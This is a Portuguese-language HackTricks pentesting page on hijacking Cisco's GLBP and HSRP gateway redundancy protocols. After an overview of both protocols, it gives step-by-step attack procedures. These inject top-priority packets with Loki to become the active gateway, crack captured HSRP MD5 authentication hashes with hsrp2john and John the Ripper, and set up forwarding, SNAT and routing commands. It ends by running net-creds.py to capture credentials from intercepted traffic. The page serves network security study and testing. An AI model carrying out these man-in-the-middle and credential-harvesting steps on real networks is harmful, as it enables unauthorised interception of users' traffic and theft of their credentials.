# Ataques GLBP & HSRP
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)! Outras maneiras de apoiar o HackTricks: * Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com) * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
## Visão Geral do Sequestro FHRP ### Insights sobre FHRP FHRP é projetado para fornecer robustez de rede, combinando vários roteadores em uma única unidade virtual, melhorando assim a distribuição de carga e a tolerância a falhas. A Cisco Systems introduziu protocolos proeminentes nesta suíte, como GLBP e HSRP. ### Insights do Protocolo GLBP A criação da Cisco, GLBP, funciona na pilha TCP/IP, utilizando UDP na porta 3222 para comunicação. Roteadores em um grupo GLBP trocam pacotes "hello" em intervalos de 3 segundos. Se um roteador falhar em enviar esses pacotes por 10 segundos, presume-se que ele está offline. No entanto, esses temporizadores não são fixos e podem ser modificados. ### Operações e Distribuição de Carga do GLBP O GLBP se destaca ao permitir a distribuição de carga entre roteadores usando um único IP virtual associado a vários endereços MAC virtuais. Em um grupo GLBP, cada roteador está envolvido no encaminhamento de pacotes. Ao contrário do HSRP/VRRP, o GLBP oferece um balanceamento de carga genuíno por meio de vários mecanismos: - **Balanceamento de Carga Dependente do Host:** Mantém a atribuição de endereço MAC AVF consistente para um host, essencial para configurações NAT estáveis. - **Balanceamento de Carga Round-Robin:** A abordagem padrão, alternando a atribuição de endereço MAC AVF entre hosts solicitantes. - **Balanceamento de Carga Round-Robin Ponderado:** Distribui a carga com base em métricas de "Peso" predefinidas. ### Componentes Chave e Terminologias no GLBP - **AVG (Gateway Virtual Ativo):** O roteador principal, responsável por alocar endereços MAC para roteadores pares. - **AVF (Encaminhador Virtual Ativo):** Um roteador designado para gerenciar o tráfego de rede. - **Prioridade GLBP:** Uma métrica que determina o AVG, começando com um padrão de 100 e variando entre 1 e 255. - **Peso GLBP:** Reflete a carga atual em um roteador, ajustável manualmente ou por meio de Rastreamento de Objetos. - **Endereço IP Virtual GLBP:** Serve como gateway padrão da rede para todos os dispositivos conectados. Para interações, o GLBP utiliza o endereço multicast reservado 224.0.0.102 e a porta UDP 3222. Os roteadores transmitem pacotes "hello" em intervalos de 3 segundos e são considerados não operacionais se um pacote for perdido por mais de 10 segundos. ### Mecanismo de Ataque GLBP Um atacante pode se tornar o roteador principal enviando um pacote GLBP com o valor de prioridade mais alto (255). Isso pode levar a ataques de DoS ou MITM, permitindo a interceptação ou redirecionamento de tráfego. ### Executando um Ataque GLBP com Loki [Loki](https://github.com/raizo62/loki_on_kali) pode realizar um ataque GLBP injetando um pacote com prioridade e peso definidos como 255. As etapas pré-ataque envolvem a coleta de informações como o endereço IP virtual, presença de autenticação e valores de prioridade do roteador usando ferramentas como Wireshark. Passos do Ataque: 1. Alterar para o modo promíscuo e ativar o encaminhamento IP. 2. Identificar o roteador alvo e recuperar seu IP. 3. Gerar um ARP Gratuito. 4. Injetar um pacote GLBP malicioso, se passando pelo AVG. 5. Atribuir um endereço IP secundário à interface de rede do atacante, espelhando o IP virtual do GLBP. 6. Implementar SNAT para visibilidade total do tráfego. 7. Ajustar o roteamento para garantir o acesso contínuo à internet por meio do roteador AVG original. Seguindo esses passos, o atacante se posiciona como um "homem no meio", capaz de interceptar e analisar o tráfego de rede, incluindo dados não criptografados ou sensíveis. Para demonstração, aqui estão os trechos de comando necessários: ```bash # Enable promiscuous mode and IP forwarding sudo ip link set eth0 promisc on sudo sysctl -w net.ipv4.ip_forward=1 # Configure secondary IP and SNAT sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0 sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Adjust routing sudo route del default sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 ``` ### Explicação Passiva do Sequestro de HSRP com Detalhes de Comando #### Visão Geral do Sequestro de HSRP (Protocolo de Redundância/Roteador em Espera) HSRP é um protocolo proprietário da Cisco projetado para redundância de gateway de rede. Ele permite a configuração de vários roteadores físicos em uma unidade lógica única com um endereço IP compartilhado. Essa unidade lógica é gerenciada por um roteador primário responsável por direcionar o tráfego. Ao contrário do GLBP, que usa métricas como prioridade e peso para balanceamento de carga, o HSRP depende de um único roteador ativo para o gerenciamento de tráfego. #### Funções e Terminologia no HSRP - **Roteador Ativo do HSRP**: O dispositivo que atua como gateway, gerenciando o fluxo de tráfego. - **Roteador em Espera do HSRP**: Um roteador de backup, pronto para assumir se o roteador ativo falhar. - **Grupo HSRP**: Um conjunto de roteadores colaborando para formar um único roteador virtual resiliente. - **Endereço MAC do HSRP**: Um endereço MAC virtual atribuído ao roteador lógico na configuração do HSRP. - **Endereço IP Virtual do HSRP**: O endereço IP virtual do grupo HSRP, atuando como gateway padrão para dispositivos conectados. #### Versões do HSRP O HSRP possui duas versões, HSRPv1 e HSRPv2, diferindo principalmente em capacidade de grupo, uso de IP multicast e estrutura de endereço MAC virtual. O protocolo utiliza endereços IP multicast específicos para a troca de informações de serviço, com pacotes Hello enviados a cada 3 segundos. Um roteador é considerado inativo se nenhum pacote for recebido dentro de um intervalo de 10 segundos. #### Mecanismo de Ataque do HSRP Os ataques do HSRP envolvem assumir à força o papel do Roteador Ativo injetando um valor de prioridade máximo. Isso pode levar a um ataque de Homem-no-Meio (MITM). Etapas essenciais pré-ataque incluem coletar dados sobre a configuração do HSRP, o que pode ser feito usando o Wireshark para análise de tráfego. #### Etapas para Bypassing da Autenticação do HSRP 1. Salve o tráfego de rede contendo dados do HSRP como um arquivo .pcap. ```shell tcpdump -w hsrp_traffic.pcap ``` 2. Extraia hashes MD5 do arquivo .pcap usando hsrp2john.py. ```shell python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes ``` 3. Quebre os hashes MD5 usando o John the Ripper. ```shell john --wordlist=mywordlist.txt hsrp_hashes ``` **Executando a Injeção de HSRP com Loki** 1. Inicie o Loki para identificar anúncios do HSRP. 2. Defina a interface de rede para o modo promíscuo e ative o encaminhamento de IP. ```shell sudo ip link set eth0 promisc on sudo sysctl -w net.ipv4.ip_forward=1 ``` 3. Use o Loki para direcionar um roteador específico, insira a senha do HSRP quebrada e faça as configurações necessárias para se passar pelo Roteador Ativo. 4. Após obter o papel de Roteador Ativo, configure sua interface de rede e tabelas de IP para interceptar o tráfego legítimo. ```shell sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0 sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE ``` 5. Modifique a tabela de roteamento para rotear o tráfego através do antigo Roteador Ativo. ```shell sudo route del default sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 ``` 6. Use net-creds.py ou uma ferramenta similar para capturar credenciais do tráfego interceptado. ```shell sudo python2 net-creds.py -i eth0 ``` Executar essas etapas coloca o atacante em uma posição para interceptar e manipular o tráfego, semelhante ao procedimento para o sequestro de GLBP. Isso destaca a vulnerabilidade em protocolos de redundância como o HSRP e a necessidade de medidas de segurança robustas. # Referências - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)